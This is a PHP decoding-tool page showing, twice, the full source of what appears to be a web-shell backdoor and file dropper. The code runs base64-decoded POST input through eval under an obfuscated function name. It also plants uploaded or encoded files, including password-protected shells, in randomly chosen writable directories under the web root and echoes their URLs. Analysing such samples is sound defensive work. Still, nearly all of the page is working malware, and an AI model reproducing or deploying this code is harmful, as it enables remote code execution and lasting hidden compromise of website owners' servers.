Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<!--FILE IS NULL OR EMPTY--> <?php $version = "1.5"; if(!empty($_POST["gjwqweodsa"]) ..
Decoded Output download
<!--FILE IS NULL OR EMPTY-->
<?php
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "
@unlink(\"".$mpath."dsadasdsa1fag1.php\");
";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php
".$fnsdht($_POST["gjwqweodsa"])."
?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
$fname = trim($_POST['fname']);
$save_type = trim($_POST['save_type']);
$dirname = trim($_POST['dirname']);
$namecrt = trim($_POST['namecrt']);
$auth_pass = trim($_POST['auth_pass']);
$change_pass = trim($_POST['change_pass']);
$file_type = trim($_POST['file_type']);
$ftdata = trim($_POST['ftdata']);
$is_sh = trim($_POST['is_sh']);
if($namecrt == "random"){
$fname = make_name($fname);
}
$uploadfile = "";
if($save_type == "same_dir"){
$uploadfile = realpath("")."/". $fname;
}else if($save_type == "sub_dir"){
$uploadfile = realpath("")."/$dirname/". $fname;
if(!@mkdir(realpath("")."/$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
if(@is_writable($root)){
$uploadfile = $root.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root_in_dir"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
$uploadfile = $root."$dirname/". $fname;
if(!@mkdir($root."$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "random_dir"){
$uploadfile = choose_dir();
if(@is_writable($uploadfile)){
$uploadfile = $uploadfile.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "random_dir_random_dirname"){
$dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
$dr = $dirs[array_rand($dirs)];
$chodir = choose_dir();
$uploadfile = $chodir.$dr."/".$fname;
if(!@mkdir($chodir."$dr/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else{
$uploadfile = realpath("")."/". $fname;
}
if($file_type == "file"){
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
{
if($is_sh == "1" or $is_sh == 1){
if($change_pass == "1" or $change_pass == 1){
}else{
$auth_pass = "";
}
$d = @file_get_contents($uploadfile);
$d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
@file_put_contents($uploadfile,$d);
}
$url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
echo "UPLOAD:".$url."-END";
}
else
{
echo "ERROR upload";
}
}else{
if($is_sh == "1" or $is_sh == 1){
if($change_pass == "1" or $change_pass == 1){
}else{
$auth_pass = "";
}
$ftdata = base64_decode($ftdata);
$ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
}
if(@file_put_contents($uploadfile,$ftdata)){
@chmod($uploadfile,0644);
echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
}else{
$fp = fopen($uploadfile, "w");
if($fp === false){
echo "ERROR upload";
}else{
@fputs ($fp, $ftdata);
@fclose ($fp);
@chmod($uploadfile,0644);
echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
}
}
}
}
function make_name($curname){
$l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
$leng = rand(3, 9);
$ret = "";
for($i = 0; $i < $leng; $i++){
$ret .= $l[array_rand($l)];
}
$curname = explode(".",$curname);
return $ret.".".$curname[1];
}
function choose_dir(){
$lim = 0;
$res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
$t = array();
for($j = 0; $j < count($res_dirs); $j++){
$ct = explode("/",$res_dirs[$j]);
$t[] = count($ct);
}
arsort($t);
$cpath = "";
$wrt_dirs = array();
foreach($t as $key=>$val){
if(@is_writable($res_dirs[$key])){
if(@file_put_contents($res_dirs[$key]."t.php","hello")){
@unlink($res_dirs[$key]."t.php");
//$cpath = $res_dirs[$key];
//break;
$wrt_dirs[] = $res_dirs[$key];
}
}
}
if(!empty($wrt_dirs) and count($wrt_dirs)>1){
$cpath = $wrt_dirs[array_rand($wrt_dirs)];
}
if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
$cpath = $_SERVER['DOCUMENT_ROOT']."/";
}
return $cpath;
}
function my_scan($startDir,&$lim){
$cur_dir = @scandir($startDir);
$res = array();
for($ii = count($cur_dir)-1; $ii >=0; $ii--){
$one_dir = $cur_dir[$ii];
@set_time_limit(0);
if($lim > 100)break;
$d = $startDir.$one_dir;
if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
if(@is_readable($d."/")){
$res[] = $d."/";
$res = array_merge($res,my_scan($d."/",$lim));
}
}
$lim++;
}
return $res;
}
?>Did this file decode correctly?
Original Code
<!--FILE IS NULL OR EMPTY-->
<?php
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
$evalcheck = "\$isevalfunctionavailable = true;";
@eval($evalcheck);
if ($isevalfunctionavailable === true) {
$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
$fv = $fnsdht($_POST["gjwqweodsa"]);
@eval($fv);
//@eval($_POST["gjwqweodsa"]);
}else{
$mpath = realpath("")."/";
//$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
@include_once($mpath."dsadasdsa1fag1.php");
@unlink($mpath."dsadasdsa1fag1.php");
}else{
echo "ERROR! CANT DO NOTHING!";
}
}
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
$fname = trim($_POST['fname']);
$save_type = trim($_POST['save_type']);
$dirname = trim($_POST['dirname']);
$namecrt = trim($_POST['namecrt']);
$auth_pass = trim($_POST['auth_pass']);
$change_pass = trim($_POST['change_pass']);
$file_type = trim($_POST['file_type']);
$ftdata = trim($_POST['ftdata']);
$is_sh = trim($_POST['is_sh']);
if($namecrt == "random"){
$fname = make_name($fname);
}
$uploadfile = "";
if($save_type == "same_dir"){
$uploadfile = realpath("")."/". $fname;
}else if($save_type == "sub_dir"){
$uploadfile = realpath("")."/$dirname/". $fname;
if(!@mkdir(realpath("")."/$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
if(@is_writable($root)){
$uploadfile = $root.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "root_in_dir"){
$root = $_SERVER['DOCUMENT_ROOT']."/";
$uploadfile = $root."$dirname/". $fname;
if(!@mkdir($root."$dirname/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "random_dir"){
$uploadfile = choose_dir();
if(@is_writable($uploadfile)){
$uploadfile = $uploadfile.$fname;
}else{
$uploadfile = realpath("")."/". $fname;
}
}else if($save_type == "random_dir_random_dirname"){
$dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
$dr = $dirs[array_rand($dirs)];
$chodir = choose_dir();
$uploadfile = $chodir.$dr."/".$fname;
if(!@mkdir($chodir."$dr/", 0755)){
$uploadfile = realpath("")."/". $fname;
}
}else{
$uploadfile = realpath("")."/". $fname;
}
if($file_type == "file"){
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
{
if($is_sh == "1" or $is_sh == 1){
if($change_pass == "1" or $change_pass == 1){
}else{
$auth_pass = "";
}
$d = @file_get_contents($uploadfile);
$d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
@file_put_contents($uploadfile,$d);
}
$url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
echo "UPLOAD:".$url."-END";
}
else
{
echo "ERROR upload";
}
}else{
if($is_sh == "1" or $is_sh == 1){
if($change_pass == "1" or $change_pass == 1){
}else{
$auth_pass = "";
}
$ftdata = base64_decode($ftdata);
$ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
}
if(@file_put_contents($uploadfile,$ftdata)){
@chmod($uploadfile,0644);
echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
}else{
$fp = fopen($uploadfile, "w");
if($fp === false){
echo "ERROR upload";
}else{
@fputs ($fp, $ftdata);
@fclose ($fp);
@chmod($uploadfile,0644);
echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
}
}
}
}
function make_name($curname){
$l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
$leng = rand(3, 9);
$ret = "";
for($i = 0; $i < $leng; $i++){
$ret .= $l[array_rand($l)];
}
$curname = explode(".",$curname);
return $ret.".".$curname[1];
}
function choose_dir(){
$lim = 0;
$res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
$t = array();
for($j = 0; $j < count($res_dirs); $j++){
$ct = explode("/",$res_dirs[$j]);
$t[] = count($ct);
}
arsort($t);
$cpath = "";
$wrt_dirs = array();
foreach($t as $key=>$val){
if(@is_writable($res_dirs[$key])){
if(@file_put_contents($res_dirs[$key]."t.php","hello")){
@unlink($res_dirs[$key]."t.php");
//$cpath = $res_dirs[$key];
//break;
$wrt_dirs[] = $res_dirs[$key];
}
}
}
if(!empty($wrt_dirs) and count($wrt_dirs)>1){
$cpath = $wrt_dirs[array_rand($wrt_dirs)];
}
if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
$cpath = $_SERVER['DOCUMENT_ROOT']."/";
}
return $cpath;
}
function my_scan($startDir,&$lim){
$cur_dir = @scandir($startDir);
$res = array();
for($ii = count($cur_dir)-1; $ii >=0; $ii--){
$one_dir = $cur_dir[$ii];
@set_time_limit(0);
if($lim > 100)break;
$d = $startDir.$one_dir;
if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
if(@is_readable($d."/")){
$res[] = $d."/";
$res = array_merge($res,my_scan($d."/",$lim));
}
}
$lim++;
}
return $res;
}
?>Function Calls
| None |
Stats
| MD5 | 62c8486b3d05c537e5f81efec750937b |
| Eval Count | 0 |
| Decode Time | 117 ms |